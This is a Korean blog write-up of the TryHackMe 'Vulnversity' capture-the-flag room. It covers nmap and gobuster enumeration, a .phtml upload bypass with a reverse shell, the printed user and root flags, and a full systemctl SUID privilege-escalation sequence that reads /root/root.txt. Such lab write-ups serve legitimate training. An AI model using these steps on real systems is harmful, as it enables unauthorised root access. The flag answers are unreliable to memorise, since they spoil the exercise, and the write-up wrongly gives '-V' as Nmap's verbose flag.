상세 컨텐츠

본문 제목

[TryHackMe] Vulnversity

Penetration/TryHackMe

by obscurity_ 2024. 9. 12. 23:22

본문

✅Scan the box; how many ports are open?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -p- --open --max-retries 1 --min-rate 3000 10.10.178.151 -Pn      
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:48 KST
Nmap scan report for 10.10.178.151
Host is up (0.29s latency).
Not shown: 65391 closed tcp ports (reset), 138 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3333/tcp open  dec-notes

Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds

Answer : 6

 

 

✅What version of the squid proxy is running on the machine?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# nmap -sV -sC -Pn -p 3128 10.10.178.151                            
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-09-12 21:50 KST
Nmap scan report for 10.10.178.151
Host is up (0.37s latency).

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.12

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.80 seconds

Answer : 3.5.12

 

 

✅How many ports will Nmap scan if the flag -p-400 was used?

Answer : 400

 

 

✅What is the most likely operating system this machine is running?
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/12%OT=21%CT=1%CU=32395%PV=Y%DS=5%DC=I%G=Y%TM=66E2
OS:E410%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)
OS:SEQ(SP=106%GCD=1%ISR=10F%TI=Z%TS=8)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%II=I%TS
OS:=8)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)OPS(O1=M508ST11NW7%O2=M5
OS:08ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(
OS:W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903
OS:%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 5 hops

OS detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds

Answer : Ubuntu

 

 

✅What port is the web server running on?

Answer : 3333

 

 

✅It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).

 

Answer : YES

 

 

✅What is the flag for enabling verbose mode using Nmap?

Answer : -V

 

 

✅I have successfully configured Gobuster.

Answer : YES

 

 

✅What is the directory that has an upload form page?
┌──(root㉿kali)-[~/hack/LAB/vulnversity]
└─# gobuster dir -k -w /usr/share/dirb/wordlists/common.txt -u <http://10.10.178.151:3333/>
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     <http://10.10.178.151:3333/>
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 299]
/.htpasswd            (Status: 403) [Size: 299]
/css                  (Status: 301) [Size: 319] [--> <http://10.10.178.151:3333/css/>]
/fonts                (Status: 301) [Size: 321] [--> <http://10.10.178.151:3333/fonts/>]
/images               (Status: 301) [Size: 322] [--> <http://10.10.178.151:3333/images/>]
/index.html           (Status: 200) [Size: 33014]
/internal             (Status: 301) [Size: 324] [--> <http://10.10.178.151:3333/internal/>]
/js                   (Status: 301) [Size: 318] [--> <http://10.10.178.151:3333/js/>]

Answer : /internal/

 

 

✅What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.

 

Answer : .php

 

 

✅I understand the Burpsuite tool and its purpose during pentesting.

Answer : YES

 

 

✅What extension is allowed after running the above exercise?

Answer : .phtml

 

 

✅While completing the above exercise, I have successfully downloaded the PHP reverse shell.

파일이 업로드 된 경로 확인 및 실행

리버스쉘 연결을 위해 소프트웨어 존재 여부 확인

revshell에서 얻은 파이썬3 리버스쉘 스크립트로 초기침투 성공

Answer : YES

 

 

✅What is the name of the user who manages the webserver?
www-data@vulnuniversity:/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Jul 31  2019 .
drwxr-xr-x 23 root root 4096 Jul 31  2019 ..
drwxr-xr-x  2 bill bill 4096 Jul 31  2019 bill

Answer : bill

 

 

✅What is the user flag?
www-data@vulnuniversity:/home$ cd bill
www-data@vulnuniversity:/home/bill$ ls -la
total 24
drwxr-xr-x 2 bill bill 4096 Jul 31  2019 .
drwxr-xr-x 3 root root 4096 Jul 31  2019 ..
-rw-r--r-- 1 bill bill  220 Jul 31  2019 .bash_logout
-rw-r--r-- 1 bill bill 3771 Jul 31  2019 .bashrc
-rw-r--r-- 1 bill bill  655 Jul 31  2019 .profile
-rw-r--r-- 1 bill bill   33 Jul 31  2019 user.txt
www-data@vulnuniversity:/home/bill$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb

Answer : 8bd7992fbe8a6ad22a63361004cfcedb

 

 

✅On the system, search for all SUID files. Which file stands out?
www-data@vulnuniversity:/home/bill$ find / -type f -perm -4000 2>/dev/null 
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

Answer : /bin/systemctl

 

 

✅What is the root flag value?
www-data@vulnuniversity:/home/bill$ cd /bin
www-data@vulnuniversity:/bin$ TF=$(mktemp).service
www-data@vulnuniversity:/bin$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/bin$ ./systemctl link $TF
Created symlink from /etc/systemd/system/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ ./systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.emh8H8dSWF.service to /tmp/tmp.emh8H8dSWF.service.
www-data@vulnuniversity:/bin$ cat /tmp/output    
a58ff8579f0a9270368d33a9966c7fd5

Answer : a58ff8579f0a9270368d33a9966c7fd5

'Penetration > TryHackMe' 카테고리의 다른 글

[TryHackMe] Daily Bugle  (2) 2024.09.26
[TryHackMe] Skynet  (2) 2024.09.26
[TryHackMe] Game Zone  (1) 2024.09.25
[TryHackMe] HackPark  (0) 2024.09.25
[TryHackMe] Alfred  (3) 2024.09.25

관련글 더보기